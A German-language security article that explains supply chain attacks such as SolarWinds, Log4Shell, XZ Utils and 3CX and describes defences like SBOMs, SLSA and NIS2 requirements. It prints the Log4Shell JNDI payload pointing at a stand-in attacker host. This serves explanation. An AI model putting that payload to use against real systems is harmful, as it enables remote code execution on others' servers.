Supply Chain Angriffe: SolarWinds, Log4Shell und die unsichtbare Bedrohung
Supply Chain Angriffe erklärt: wie SolarWinds, Log4Shell und XZ Utils funktionieren, warum sie so gefährlich sind, und wie Unternehmen ihre Software-Lieferkette absichern.
Inhaltsverzeichnis (7 Abschnitte)
Ein Unternehmen kann seine eigene IT perfekt absichern - und trotzdem kompromittiert werden, wenn ein vertrauenswürdiger Softwareanbieter zum Trojaner wird. Supply Chain Angriffe gehören zu den gefährlichsten Angriffsszenarien, weil sie legitime Vertrauensbeziehungen ausnutzen.
Was sind Supply Chain Angriffe?
Ein Supply Chain Angriff (Lieferkettenangriff) zielt nicht auf das Opfer direkt, sondern auf einen Lieferanten oder Dienstleister, dem das Opfer vertraut. Der Angreifer kompromittiert einen vorgelagerten Partner - und gelangt über diesen “durch die Hintertür” in das eigentliche Ziel.
Das Grundprinzip: Wenn ein Unternehmen einer Software vertraut und diese Software automatisch Updates einspielt, kann ein kompromittierter Update-Mechanismus zur Waffe werden.
ENISA-Studie (2021): In 66% der analysierten Supply Chain Angriffe fokussierten sich Angreifer auf den Softwareanbieter-Code - nicht auf die Liefermethode. Die Angreifer waren in Bezug auf Ressourcen und Fähigkeiten deutlich überlegen gegenüber den angegriffenen Unternehmen.
Die größten Supply Chain Angriffe der Geschichte
SolarWinds SUNBURST (2020)
Was passierte: Russische Geheimdienst-Hacker (APT29/Cozy Bear) kompromitierten die Build-Pipeline des IT-Monitoring-Anbieters SolarWinds. In den offiziellen Software-Updates für das Produkt “Orion” wurde bösartiger Code (SUNBURST-Backdoor) eingeschleust.
Ablauf:
- Angreifer erlangten Zugang zur Entwicklungsumgebung von SolarWinds (vermutlich 2019)
- Injektion von SUNBURST-Backdoor in den Build-Prozess
- Signierter, legitimer Orion-Softwareupdate mit Backdoor ausgeliefert
- ~18.000 Kunden installierten das kompromittierte Update - ohne es zu wissen
- Backdoor rief erst nach 2 Wochen nach Hause (Sandbox-Evasion)
- Gezielte Aktivierung bei hochwertigem Zielen: US-Finanzministerium, Pentagon, Sicherheitsfirmen
Entdeckung: Erst Monate später durch die Sicherheitsfirma FireEye - die selbst Opfer war.
Kosten: > 100 Millionen USD Behebungsaufwand, umfangreiche Geheimdienstschäden.
Log4Shell / Log4j (CVE-2021-44228)
Was passierte: Eine kritische Zero-Day-Schwachstelle in der weit verbreiteten Java-Logging-Bibliothek Log4j 2 ermöglichte Remote Code Execution mit minimalen Voraussetzungen.
Warum so schlimm: Log4j 2 war in Millionen von Java-Anwendungen eingebunden - oft als transitive Abhängigkeit, von der Entwickler gar nicht wussten. Durch das Abhängigkeitsproblem im Java-Ökosystem war es nahezu unmöglich, alle verwundeten Instanzen sofort zu finden.
Einfachheit des Exploits:
${jndi:ldap://angreifer.com/exploit}
Diese eine Zeichenkette, in einem Log-Feld eingegeben, reichte aus für RCE. Innerhalb von 72h nach Veröffentlichung beobachteten Sicherheitsfirmen Millionen von Exploitation-Versuchen.
Betroffene Systeme: Apache, Apple iCloud, Microsoft Azure, Steam, Twitter, Cloudflare, VMware, Cisco und zigtausende andere.
XZ Utils Backdoor (CVE-2024-3094)
Was passierte: Ein Angreifer unter dem Pseudonym “Jia Tan” verbrachte 2 Jahre damit, sich als vertrauenswürdiger Open-Source-Contributor in das Projekt XZ Utils zu etablieren - und baute dann eine Backdoor ein, kurz bevor sie in Produktions-Linux-Systemen weltweit ausgerollt worden wäre.
Besonderheit: Dieser Angriff zeigte, wie staatliche Akteure gezielt Open-Source-Communities infiltrieren - über Social Engineering, Geduld und langsamen Vertrauensaufbau.
Entdeckt: Durch Zufall von Microsoft-Ingenieur Andres Freund, der ungewöhnliche CPU-Auslastung im SSH-Prozess bemerkte.
3CX Supply Chain Angriff (2023)
3CX ist eine populäre VoIP-Software. Angreifer (Lazarus Group / Nordkorea) kompromitierten ein Update der Software - was zu einer Weiterkompromittierung mehrerer Fortune 500-Unternehmen führte.
Besonders: Die 3CX-Kompromittierung selbst war das Ergebnis einer vorgelagerten Kompromittierung eines 3CX-Mitarbeiters über Trading-Software (X_TRADER) - ein Supply Chain Angriff, der durch einen anderen Supply Chain Angriff ermöglicht wurde.
Angriffsvektoren im Detail
Kompromittierung der Build-Pipeline (CI/CD)
Quellcode → Build-System → Signierung → Distribution
↑
Angreifer injiziert
bösartigen Code hier
Ziel: Einschleusung von Code, bevor die finale Binary signiert wird.
Kompromittierung von Paketregistries
- npm: typosquatting, dependency confusion
- PyPI: gefälschte Pakete mit ähnlichen Namen zu bekannten Libraries
- RubyGems, Maven Central, NuGet
Dependency Confusion: Öffentliche Paket-Registry-Namen überschreiben interne private Pakete bei schlecht konfiguriertem Dependency Resolution.
Kompromittierung von Open-Source-Projekten
- Übernahme eines verwaisenden, populären Projekts
- Social Engineering gegen Maintainer (wie XZ Utils)
- Pull Request mit verstecktem bösartigem Code
Kompromittierung von Entwickler-Workstations
- Malware auf Entwickler-Laptop → Zugang zur Codebase
- Secrets in Git-History → Zugang zu Production-Systemen
Schutzmaßnahmen: Software Supply Chain Security
Software Bill of Materials (SBOM)
Ein SBOM ist eine vollständige, maschinenlesbare Inventarliste aller Komponenten einer Software:
- Alle direkten und transitiven Dependencies
- Versions-Informationen
- Lizenzinformationen
Formate: CycloneDX, SPDX, SWID Tags
Nutzen: Wenn eine neue Schwachstelle bekannt wird, kann sofort geprüft werden, welche eigenen Systeme betroffen sind. NIS2 und US-Executive Order 14028 fordern SBOMs für kritische Software.
SLSA - Supply Chain Levels for Software Artifacts
SLSA (ausgesprochen “salsa”) ist ein Framework zur Absicherung von Build-Pipelines, entwickelt von Google und der OpenSSF:
SLSA Level 0: Keine Garantien
SLSA Level 1: Dokumentierter Build-Prozess
SLSA Level 2: Tamper-evident Build mit Provenance
SLSA Level 3: Gehärtete Build-Plattform
SLSA Level 4: Hermetic, reproducible Builds
Jedes Level erhöht die Garantie, dass das gelieferte Artefakt tatsächlich aus dem deklarierten Quellcode entstanden ist.
Dependency Management Best Practices
✓ Dependency Pinning: Exakte Versionsnummern (nicht: ^1.2.3)
✓ Lock Files: package-lock.json, Cargo.lock, requirements.txt mit Hashes
✓ Dependency Review: PR-Checks bei neuen/aktualisierten Dependencies
✓ SCA-Tools: Snyk, Dependabot, GitHub Advanced Security
✓ Vulnerability Alerts: Automatische Notifications bei neuen CVEs in Dependencies
✓ Minimierung: So wenig Dependencies wie möglich
Vendor Risk Management
- Sicherheitsfragebögen für Schlüssellieferanten
- NIS2-Anforderungen an Lieferkettensicherheit (Art. 21)
- Vertragsklauseln für Sicherheitsstandards und Meldepflichten bei Incidents
- Monitoring von Lieferanten (OSINT, Security-Ratings-Dienste wie SecurityScorecard)
Zero Trust für Software-Lieferketten
- Code Signing: Alle Releases mit Signaturen versehen (Sigstore/cosign für Open Source)
- Artifact Verification: Signatur-Verifikation vor jeder Deployment
- Least Privilege in CI/CD: Build-Pipelines bekommen nur minimal notwendige Secrets
- Ephemeral Build Environments: Jeder Build in frischer, nicht persistenter Umgebung
SBOM und Schwachstellenmanagement verbinden
SBOM erstellen
│
▼
Gegen CVE-Datenbanken abgleichen (OSV, NVD)
│
▼
Betroffene Komponenten identifizieren
│
▼
Update/Mitigationsplan erstellen
│
▼
Deployment und Verifizierung
Regulatorische Anforderungen
NIS2
Art. 21 NIS2 fordert explizit Sicherheitsmaßnahmen in der Lieferkette als Pflichtbestandteil des Risikomanagements. Kritische und wichtige Einrichtungen müssen:
- Lieferanten-Sicherheitsanforderungen definieren
- Lieferanten nach Sicherheitsrisiken bewerten
- Vertragliche Sicherheitsanforderungen einbeziehen
Cyber Resilience Act (CRA)
Der EU Cyber Resilience Act (2024 in Kraft getreten) verpflichtet Hersteller von Produkten mit digitalen Elementen zu:
- SBOM für alle Produkte
- Sicherheitsupdates für die gesamte Produktlebensdauer
- Meldepflicht für aktiv ausgenutzte Schwachstellen
US Executive Order 14028
Für US-Bundesbehörden: verpflichtende SBOM-Anforderungen, SLSA-Empfehlungen, Secure-by-Design-Prinzipien für alle Softwarelieferanten.
Erkennung von Supply Chain Angriffen
Supply Chain Angriffe sind besonders schwer zu erkennen, weil die Angriffs-Payload aus einer vertrauenswürdigen Quelle stammt. Hinweise:
- Unerklärliche Netzwerkverbindungen von legitimen Anwendungen zu unbekannten Hosts
- Ungewöhnliche Prozesse die von bekannten Binaries gestartet werden
- Code-Signing-Anomalien (anderes Zertifikat als üblich)
- Build-Pipeline-Alarme (unerwartete Build-Artefakte, unautorisierte Änderungen)
- Dependency-Graph-Veränderungen ohne entsprechende Code-Änderungen
EDR-Regeln für Supply Chain:
- Alerts bei Software mit hohem Verbreitungsgrad die ungewöhnliche Prozesse starten
- Monitoring von bekannter Verwaltungssoftware (RMM, Monitoring-Agents)
Fazit
Supply Chain Angriffe zeigen, dass die Sicherheit einer Organisation so stark ist wie ihre schwächste Vertrauensbeziehung. Das wichtigste Gegenparadigma ist Zero Trust: Kein Software-Artefakt, kein Update und kein Lieferant sollte automatisch als vertrauenswürdig gelten - auch wenn er eine gültige Signatur trägt. SBOMs, Dependency-Pinning, SLSA und robustes Vendor Risk Management sind die praktischen Werkzeuge, um die eigene Software-Lieferkette zu verstehen und abzusichern.
Quellen & Referenzen
- [1] CISA Advisory: SolarWinds Supply Chain Compromise - CISA
- [2] ENISA Threat Landscape for Supply Chain Attacks 2021 - ENISA
- [3] BSI: Sicherheit in der Softwarelieferkette - BSI
- [4] SLSA - Supply Chain Levels for Software Artifacts - Google / OpenSSF
Fragen zu diesem Thema?
Unsere Experten beraten Sie kostenlos und unverbindlich.
Über den Autor
M.Sc. Internet-Sicherheit (if(is), Westfälische Hochschule). COO und Prokurist mit Expertise in Informationssicherheitsberatung und Security Awareness. Nachwuchsprofessor für Cyber Security an der FOM Hochschule, CISO-Referent bei der isits AG und Promovend am Graduierteninstitut NRW.
17 Publikationen
- Understanding the Privacy Implications of Browser Extensions (2025)
- Different Seas, Different Phishes — Large-Scale Analysis of Phishing Simulations Across Different Industries (2025)
- Security Awareness Trainings - A Scientometric Analysis (2024)
- Understanding Dark Patterns in Chatbots (2024)
- Exploring the Effects of Cybersecurity Awareness and Decision-Making Under Risk (2024)
- Analyzing Cybersecurity Risk with a Phishing Simulation Website (2024)
- The Elephant in the Background: A Quantitative Approach to Empower Users Against Web Browser Fingerprinting (2023)
- On the Similarity of Web Measurements Under Different Experimental Setups (2023)
- Building a Cybersecurity Awareness Program for SMEs (2022)
- Rethinking Cookie Banners: How to Comply with the GDPR and Still not Annoy Users (2022)
- An Empirical Analysis on the Use and Reporting of National Security Letters (2022)
- Comparing Approaches for Secure Communication in E-Mail-Based Business Processes (2022)
- Phish and Chips: Experiences from an Automated Phishing System (2022)
- Digital Risk Management (DRM) (2020)
- Social Media Scraper im Einsatz (2021)
- People, Processes, Technology — The Cybersecurity Triad (2023)
- New Work — Die Herausforderungen eines modernen ISMS (2024)